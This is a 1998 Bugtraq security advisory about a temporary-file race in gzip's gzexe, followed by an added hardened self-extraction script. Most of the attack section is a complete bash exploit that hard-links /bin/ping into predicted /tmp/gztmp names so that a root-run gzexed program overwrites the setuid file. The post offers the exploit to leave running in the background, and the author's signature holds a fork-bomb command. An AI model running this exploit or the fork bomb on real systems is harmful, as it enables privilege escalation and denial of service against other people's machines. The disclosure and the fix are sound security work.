List: bugtraq
Subject: GZEXE - the big problem
From: Michał Zalewski <lcamtuf@boss.staszic.waw.pl>
Date: 1998-01-28 21:41:53
** DESCRIPTION **
GZEXE, part of the gzip package, is a small utility which allows
'transparent' compression of any kind of executable (just like pklite
under MS-DOS). Unfortunately, it may be extremely dangerous. Here's
the shell script used for decompression:
if /usr/bin/tail +$skip $0 | "/usr/bin"/gzip -cd > /tmp/gztmp$$; then...
                             ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
[...]
/tmp/gztmp$$ ${1+"$@"}; res=$?
^^^^^^^^^^^^
Just look at this... An example of a badly-written one ;) It's possible
to overwrite any file (including SUIDs!) with the code of a gzexed executable
when root executes it... Then, this unwanted suid may be easily exploited.
It's also possible to enforce execution of OUR OWN code instead of the
gzexed program, just by choosing as a victim any file not owned by the
user running vulnerable executables, but writable by him/her. This
file (even setuid) may be freely modified by the attacker... Whoops!
** EXPLOIT **
-- GZEXE EXPLOIT --
#!/bin/bash
# GZEXE executables exploit (gzip 1.2.4)
# by Michal Zalewski (lcamtuf@staszic.waw.pl)
# ---------------------------------------------
VICTIM=/bin/ping
GZEXED=a.out
# Note: to locate gzexed executables you may use this:
# find / -type f -exec grep "/tmp/gztmp\\\$\\\$ \\\$" {} \; -print|cut -f 1 -d " "
if [ ! -f $VICTIM ]; then
echo "I can't find my victim ($VICTIM)..."
exit 0
fi
ORIG=`ls -l $VICTIM|awk '{print \$5}'`
echo "GZEXE exploit launched against $VICTIM ($ORIG bytes)."
renice +20 $PPID >&/dev/null
cd /tmp
touch $GZEXED
while :; do
START=`ps|awk '$6=="ps"{print $1}'`
let START=START+100
let DO=START+100
while [ "$START" -lt "$DO" ]; do
ln $VICTIM gztmp$START &>/dev/null
let START=START+1
done
sleep 10
rm -f gztmp* &>/dev/null
NOWY=`ls -l $VICTIM|awk '{print \$5}'`
if [ ! "$ORIG" = "$NOWY" ]; then
echo "Done, my master."
exit 0
fi
done
-- EOF --
It may be left in the background, just like my gcc-exploit-2. Please
verify the vulnerable executable filename (GZEXED - you may specify more
than one file, separated by spaces).
** FIX **
DO NOT USE GZEXE TO COMPRESS EXECUTABLES.
That's all, TMPDIR will NOT help in this case.
_______________________________________________________________________
Michal Zalewski [tel 9690] | finger 4 PGP [lcamtuf@boss.staszic.waw.pl]
To iterate is human, to recurse divine [P. Deutsch]
=------- [ echo -e "while :;do \$0&\ndone">_;chmod +x _;./_ ] --------=
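As an added example (not part of the original post nor of the gzip project), a self-extraction routine hardened against the race described above: it unpacks into a private directory from mktemp(1) instead of the predictable /tmp/gztmp$$, uses noclobber redirection so an existing file is never reused, and checks ownership and link count before executing the result. The function names safe_extract, check_private_file and make_demo are assumptions, and the demo payload is constructed.

```shell
#!/bin/sh
# Hardened self-extraction stub (added example, hypothetical names).
# The gzexe stub writes to /tmp/gztmp$$ and then runs whatever is there,
# so a planted link at that name can redirect the write or the exec.

# Return 0 only if $1 is a plain file, not a symlink, with link count 1,
# owned by the calling uid.  ls -ln: field 2 = links, field 3 = owner uid.
check_private_file() {
    f=$1
    [ -f "$f" ] && [ ! -L "$f" ] || return 1
    set -- $(ls -ln "$f")
    [ "$2" -eq 1 ] && [ "$3" -eq "$(id -u)" ]
}

# $1 = self-extracting file, $2 = number of stub lines before the gzip
# payload (gzexe's $skip); remaining args go to the extracted program.
safe_extract() {
    self=$1; skip=$2; shift 2
    umask 077
    # mktemp -d: unpredictable name, mode 0700, created atomically
    tmpd=$(mktemp -d "${TMPDIR:-/tmp}/gzexe.XXXXXX") || return 1
    prog=$tmpd/prog
    # set -C (noclobber): '>' fails instead of following a planted file
    if ! ( set -C; tail -n +$((skip + 1)) "$self" | gzip -cd > "$prog" ); then
        rm -rf "$tmpd"; return 1
    fi
    if ! check_private_file "$prog"; then
        rm -rf "$tmpd"; return 1
    fi
    chmod 700 "$prog"
    "$prog" "$@"; res=$?
    rm -rf "$tmpd"
    return $res
}

# Constructed demo: a two-line stub followed by a gzip-compressed script.
make_demo() {
    demo=$(mktemp "${TMPDIR:-/tmp}/demo.XXXXXX") || return 1
    printf '#!/bin/sh\n# stub line 2\n' > "$demo"
    printf '#!/bin/sh\necho "hello $1"\n' | gzip -c >> "$demo"
    printf '%s\n' "$demo"
}
```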